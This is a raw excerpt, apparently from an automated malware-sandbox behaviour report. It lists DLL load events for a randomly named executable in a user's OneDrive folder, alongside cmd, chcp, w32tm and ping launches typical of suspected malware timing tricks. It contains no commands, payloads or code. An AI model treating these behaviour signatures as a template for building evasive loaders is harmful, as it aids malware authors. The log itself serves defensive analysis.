                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dll
